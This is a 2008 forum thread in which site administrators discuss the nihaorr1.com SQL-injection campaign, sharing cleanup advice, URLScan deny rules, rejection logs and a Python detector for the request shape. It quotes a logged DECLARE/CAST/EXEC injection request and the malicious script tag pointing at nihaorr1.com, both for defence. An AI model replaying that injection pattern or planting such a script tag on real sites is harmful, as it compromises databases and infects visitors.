
Thread: Anyone know about www.nihaorr1.com/1.js?

Last post 12-12-2008 9:14 PM by Paul Bishop. 109 replies.

Page 7 of 8 (110 items)

  • 05-21-2008, 10:08 PM In reply to

    • ejhay
    • Not Ranked
    • Joined on 05-19-2008, 7:42 AM
    • Posts 2

    Re: Anyone know about www.nihaorr1.com/1.js?

     

    Hi, I'm a System Administrator of a hosting company, and one of our websites has been hacked with SQL injection. At first the hacker inserted nihaorr1.com/1.js; most of the website's tables were affected by this attack. After that I created a SQL validation like the one that you have posted in this forum. Unfortunately the hacker again inserted a malicious URL into the MS SQL database. What I did is include the validation for all database-driven pages to make the website secure, but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. Please advise what else I can do about this problem. Thanks.
  • 05-21-2008, 10:11 PM In reply to

    • ejhay
    • Not Ranked
    • Joined on 05-19-2008, 7:42 AM
    • Posts 2

    Re: Anyone know about www.nihaorr1.com/1.js?

     

    Hi, I'm a System Administrator of a hosting company, and one of our websites has been hacked with SQL injection. At first the hacker inserted nihaorr1.com/1.js; most of the website's tables were affected by this attack. After that incident I developed a SQL validation that is similar to the ASP script that you posted in this forum. Unfortunately the hacker again inserted a malicious URL into the MS SQL database. What I did is include the validation for all database-driven pages to make the website secure, but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. Please advise what else I can do about this problem. Thanks.
  • 06-05-2008, 1:06 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    I have had a run-in with this injection and I have created several scripts to clean a database of injection, as long as it has not truncated over data. If people need help, hit me up.

     

    silkyfixer

  • 06-05-2008, 1:07 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Oh, and I can fix your poorly coded ASP pages that are causing it to happen too.

     

     S.

  • 06-09-2008, 12:30 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Does anyone know if the SQL string can contain web-encoded characters?

    A dash "-" can also be &#107;. Does SQL Server know what to do with this, or will it throw an error?

    Cheers

     

     

     

  • 06-20-2008, 5:02 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    You can stop the SQL attacks with an ISAPI filter called "WebKnight", which is a freebie. It will, among other things, watch the string length on the forms, and if it exceeds X number of characters, it blocks it. It will also look for embedded commands etc. This has stopped the attacks against our servers for the past three weeks. The company name is "Aqtronix": http://www.aqtronix.com/?PageID=99
  • 08-11-2008, 5:55 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?


    The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor. The worst part of it all is that these infestations are not in seamy Web sites; they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitor's machine to find ways to compromise the visitor's machine. Exploits are then downloaded and used to infect the redirected visitor based on the information found on the scan.

    ---------------------------

    kimrennin



    WideCircles

     



  • 08-21-2008, 6:43 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    URLScan 3.0 was released to help with these types of automated attacks.

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield


    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 08-21-2008, 11:28 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Well, one sneaked through my urlscan 3.0. I am still trying to figure out how they got past the declare statement. Can you post your config?

     

    silkyfixer

     

  • 08-22-2008, 12:19 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Do you have the IIS log entry that shows the one that squeaked through?

    http://www.iislogs.com/urlscan.txt is my config.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield


    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 08-22-2008, 11:38 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    My problem is that I have various websites that connect to the same database. I need some sort of trigger that catches the update on the database with a <script in the update and tells me what site it came from. I have sanitized most of my code as well, but every 2-3 weeks one of my databases still gets infected.

    Would you have a trigger script I could install globally on my SQL server?

    thanks

    silkyfixer

  • 08-22-2008, 11:44 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    I found this for today in my logs. I noticed my database was infected this morning; it happened last night. This is the only declare in my log. I wonder if they are using something else other than declare.

    GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765
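
A log check for the request shape in the post above, as an added example that is not part of the original thread: it percent-decodes each query string and flags requests carrying at least two parts of the DECLARE/CAST/EXEC chain, so ordinary text that merely contains the word "declare" is not matched. The field order, sample lines, addresses and the `0x00` placeholder are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumed field order (the post shows no #Fields header); match your log's #Fields line.
FIELDS = ("cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip "
          "cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-substatus "
          "sc-win32-status sc-bytes cs-bytes time-taken").split()

# The three parts of the statement chain visible in the posted request.
SIGNATURE = {
    "declare": re.compile(r"\bdeclare\s+@\w+", re.I),
    "cast": re.compile(r"\bcast\s*\(", re.I),
    "exec": re.compile(r"\bexec(ute)?\s*\(", re.I),
}

# Constructed sample lines; 0x00 is a placeholder, not a real payload.
SAMPLE_LOG = """\
GET /index.asp id=5;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x00%20AS%20CHAR(4000));EXEC(@S); 80 - 192.0.2.10 Mozilla/4.0+(compatible) - - 200 0 0 34770 1607 9765
GET /m.asp id=1;%64eclare%20@s%20varchar(4000);set%20@s=cast(0x00%20as%20varchar(4000));exec(@s); 80 - 192.0.2.11 Mozilla/4.0+(compatible) - - 404 0 0 1400 900 15
GET /news.asp id=12&title=declare+your+interest 80 - 192.0.2.12 Mozilla/4.0+(compatible) - - 200 0 0 5120 300 31
""".splitlines()

def normalise(query, rounds=3):
    """Percent-decode until stable so encoded forms match the signature."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def scan(lines):
    """Return a finding for each request whose query has >= 2 signature parts."""
    findings = []
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) != len(FIELDS):
            continue  # skip W3C header lines and rows with another layout
        rec = dict(zip(FIELDS, parts))
        query = normalise(rec["cs-uri-query"])
        hits = sorted(k for k, rx in SIGNATURE.items() if rx.search(query))
        if len(hits) >= 2:
            findings.append({"url": rec["cs-uri-stem"], "client": rec["c-ip"],
                             "status": int(rec["sc-status"]), "hits": hits})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 was served by the application rather than rejected, so that page is the first place to audit how the query is built.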

  • 08-22-2008, 12:14 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    What is your urlscan.ini set up to look for?

    [SQL Injection Raw]
    AppliesTo=.asp,.aspx

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield


    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 08-22-2008, 1:20 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    [Options]
    UseDenyVerbs=1
    UseDenyExtensions=1
    NormalizeUrlBeforeScan=0
    VerifyNormalization=0
    AllowHighBitCharacters=1
    AllowDotInPath=1
    RemoveServerHeader=0
    EnableLogging=1
    PerProcessLogging=0
    AllowLateScanning=0
    PerDayLogging=1
    UseFastPathReject=0
    LogLongUrls=0
    UnescapeQueryString=1
    RejectResponseUrl=
    LoggingDirectory=Logs
    AlternateServerName=
    RuleList=Edge

    [Edge]
    AppliesTo=.asp,.aspx,.inc
    DenyDataSection=Edge Data
    ScanURL=0
    ScanAllRaw=0
    ScanQueryString=1
    ScanHeaders=

    [Edge Data]
    declare
    DECLARE
    cursor
    CURSOR

    [AllowVerbs]
    GET
    POST
    HEAD

    [DenyVerbs]
    PROPFIND
    CONNECT

    [DenyExtensions]
    .bat
    .cmd

    [DenyQueryStringSequences]
    <
    >

    If I try to use some of the ones I find on the net, it breaks most of my sites.

    thanks for your time

     

    silkyfixer

  • 08-22-2008, 1:25 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Here is a snippet from the urlscan log. You can see it kicks out the declare, so how did it sneak through? I have about 500 websites that connect to the database, so it's hard to pinpoint where or how it gets through.

     

    [08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected.  Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'

Microsoft Communities